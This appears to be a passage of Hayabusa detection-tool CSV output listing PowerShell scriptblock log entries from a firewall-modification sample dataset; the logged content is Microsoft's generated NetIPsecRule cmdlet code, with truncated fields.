[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] 
[ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 